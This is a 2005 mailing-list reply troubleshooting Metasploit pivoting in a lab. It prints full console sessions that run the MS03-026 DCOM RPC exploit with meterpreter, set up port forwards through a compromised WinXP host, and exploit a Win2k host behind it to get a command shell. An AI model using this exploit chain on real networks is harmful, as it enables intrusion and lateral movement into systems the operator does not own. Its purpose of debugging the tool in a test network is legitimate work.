use of meterpreter (copy for the list )

[mmiller at hick.org (mmiller at hick.org)]

On Wed, Apr 20, 2005 at 08:01:13AM +0200, Thomas Werth wrote:
> using single portforward explonation works. (i didn't use 3rd Party tool
> instead i used reverse explonation direct to attacking host )
>
> i hope you'll find that bug, if i can help send me "special" version and
> i'll supply detailed output.

I tried to reproduce this tonight and wasn't successful.  In my test
network I had to create an SSH tunnel to forward the exploitation to the
initial box, but that shouldn't factor into this issue.  Here's the way
things were set up:

SSH tunnels:
------------
127.0.0.1:9000 forwarded to 192.168.64.128:135  (WinXP proxy)
127.0.0.1:4444 forwarded to 192.168.64.128:4444 (WinXP proxy)

Meterpreter tunnels:
127.0.0.1:5000 forwarded to 192.168.64.132:135  (Win2k behind WinXP)
127.0.0.1:5001 forwarded to 192.168.64.132:5001 (Win2k behind WinXP)

In my test network I was unable to communicate directly with the Win2k
box, so I had to go through the WinXP box (via meterpreter).

Metasploit instance #1:
-----------------------

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > set
LPORT: 4444
PAYLOAD: win32_bind_meterpreter
RHOST: 127.0.0.1
RPORT: 8000
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x6836
[*] Got connection from 127.0.0.1:57312 <-> 127.0.0.1:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter> use -m Net
loadlib: Loading library from 'ext556839.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> portfwd -a -l 5000 -h 192.168.64.132 -p 135
portfwd: Successfully created local listener on port 5000.

... wait for instance #2 to display 'Connected to REMACT...' ...

meterpreter> portfwd -a -l 5001 -h 192.168.64.132 -p 5001
portfwd: Successfully created local listener on port 5001.
meterpreter> 

Metasploit instance #2:
-----------------------

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 5000
RPORT -> 5000
msf msrpc_dcom_ms03_026(win32_bind) > set LPORT 5001
LPORT -> 5001
msf msrpc_dcom_ms03_026(win32_bind) > set
LPORT: 5001
PAYLOAD: win32_bind
RHOST: 127.0.0.1
RPORT: 5000
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0xba20

... created portfwd on 5001 in instance #1 ...

[*] Got connection from 127.0.0.1:40577 <-> 127.0.0.1:5001

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

As far as I can tell this seems to be nearly (if not exactly the same
thing) as what you tried, so I'm not sure why you would being having a
different experience than that which I'm having.  My only guess is that
you are creating the connection handler port forward too soon, thus
causing the bind handler to establish before the exploit actually
finishes.  I figure we should probably take this thread off-list soon as
I imagine people are probably tired of seeing our spam :)  Let me know
if the above output helps at all...